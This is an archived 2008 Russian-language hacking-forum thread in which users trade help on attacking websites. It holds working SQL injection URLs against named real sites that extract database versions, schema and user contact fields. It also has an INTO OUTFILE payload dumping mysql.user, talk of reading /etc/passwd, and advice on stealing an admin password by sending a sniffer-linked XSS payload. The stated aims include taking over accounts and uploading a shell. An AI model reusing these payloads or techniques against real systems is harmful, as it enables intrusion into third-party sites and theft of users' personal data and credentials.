ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

27.04.2008, 21:48
|
|
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме: 572900
Репутация:
17
|
|
to На100ящий
Вот ссылка на оч.хорошую статью,посмотри там: https://forum.antichat.ru/thread49775.html
|
|
|

27.04.2008, 21:59
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме: 97223
Репутация:
5
|
|
to SQL~In[J]ecTi0n
Читал её уже, хорошая статья, но не выходит!!! /etc/passwd могу прочитать, а httpd.conf найти немогу. Подскажите путь...плз
|
|
|

28.04.2008, 01:28
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме: 394753
Репутация:
120
|
|
Сообщение от GOGA075
Кто-небудь знает есть ли прога или скрипт для перебра лимита и сохранении результата??
SQL Injection Pentesting TooL
|
|
|

28.04.2008, 09:44
|
|
Новичок
Регистрация: 03.10.2007
Сообщений: 5
Провел на форуме: 45623
Репутация:
0
|
|
Здравствуйте, прошу прощения за столь глупый вопрос, просто очень нужна помощь.
Суть такова, есть сайт на нем я нашел уязвимость XSS, когда вбиваешь в поля логина и пароля, <script>alert('xss')</script> браузер дружелюбнол выкидывает окошечко, всё как надо. Как мне применить эту уязвимость, в своих целях. Мне нужно стыбрить пароль от админки сайта.
|
|
|

28.04.2008, 10:17
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
m0rf, соц. инженерия. Берешь любой сниффер, перехватываешь запрос авторизации, потом составляешь xss'ку под сниффер вебовый и впариваешь её админу.
з.ы. если непонятно написал, стукни в пм или аську - объясню нормально)
|
|
|

28.04.2008, 17:39
|
|
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме: 1547094
Репутация:
120
|
|
Может ли мне кто небудь объяснить что делать с этим:
http://www.s3m.com/dma/displayuser.php?user_id=-1224+union+select+1,2,3,4,concat_ws(0x4,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14,15--
user: s3mcom_preylude@localhost
db: s3mcom_main
version: 4.1.22-standard
Я понимаю что это версия и названия бызы данных, ну знаю я эти данные но вить пароля у меня нету! зачем эти инекции тогда?и в каких целях их применять?
Последний раз редактировалось xaker-boss; 28.04.2008 в 17:41..
|
|
|

28.04.2008, 17:48
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме: 1266776
Репутация:
93
|
|
xaker-boss, инъекция как факт. Если она тебе интересна - раскручиваешь.
|
|
|

28.04.2008, 17:55
|
|
Участник форума
Регистрация: 06.03.2007
Сообщений: 283
Провел на форуме: 1547094
Репутация:
120
|
|
Смысле 'раскручиваешь' ? можно поподробней?
|
|
|

28.04.2008, 18:34
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме: 97223
Репутация:
5
|
|
Подскажите кто нибудь:
Система UNIX.
В httpd.conf прописано:
<VirtualHost *>
ServerAdmin webmaster@site.com
DocumentRoot /www/htdocs/rail
ServerName www.site.com
# ServerAlias 10.7.103.250
ServerAlias 10.7.100.4
ErrorLog /var/log/apache/railway.log
CustomLog /var/log/apache/railway.log common
</VirtualHost>
Дальше нужно записать файл в директорию /www/htdocs/rail:
www.site.com/index=4&number=1'+union+select+1,2,3,convert(те ст+using+cp1251)+from+mysql.user+into+outfile+" \\www\\htdocs\\rail\\1.txt"/*
Вроде записалось, проверяем:
www.site.com/1.txt и нифига не получилось... Кто скажет почему???
|
|
|

28.04.2008, 18:52
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме: 1266776
Репутация:
93
|
|
xaker-boss, Раскручиваешь в этом случае значит "достаешь максимум информации".
Воспользовать информацией, естественно, можно в любых целях. Начиная от доступа к аккаунтам юзеров на портале(если таковые есть) до заливки шелла.
Вся "раскрутка" описана ранее в статьях.
Могу лишь привести банальный пример:
есть у меня информация типа:
http://haty.com.ua/show.php?id=-90061+union+select+1,database(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,user(),version(),23,2 4,25/*
5.0.45-community-log
например мне этот ресурс интересен.
Зная, что это 5 ветка MSSQL, я могу воспользоваться информацией, находящейся в infromation_schema.columns, а именно имена столбцов и полей.
Код:
17:booltxt
17:--1:text
18:cities
18:--1:text
19:kvbath
19:--1:text
20:kvdata
20:--1:date
20:--2:user
20:--3:meta
20:--4:type
20:--5:city
20:--6:strt
20:--7:stor
20:--8:high
20:--9:bath
20:--10:flor
20:--11:stat
20:--12:stot
20:--13:skit
20:--14:sliv
20:--15:dstr
20:--16:wall
20:--17:hnum
20:--18:pric
20:--19:tele
20:--20:dscr
20:--21:cnam
20:--22:ctel
20:--23:mail
20:--24:agen
21:kvfloor
21:--1:text
22:kvmeta
22:--1:text
23:kvstate
23:--1:text
24:kvtype
24:--1:text
25:kvtype1rp
25:--1:text
26:kvuser
26:--1:password
27:kvwall
27:--1:text
Например меня интересуют данные, касающиеся информации о пользователях:
http://haty.com.ua/show.php?id=-90061+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,concat_ws(0x2020,user,cnam,cte l,city,tele,mail,agen),22,23,24,25+from+kvdata+lim it+0,1--
и получаю что хотел.
Все чисто для примера.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|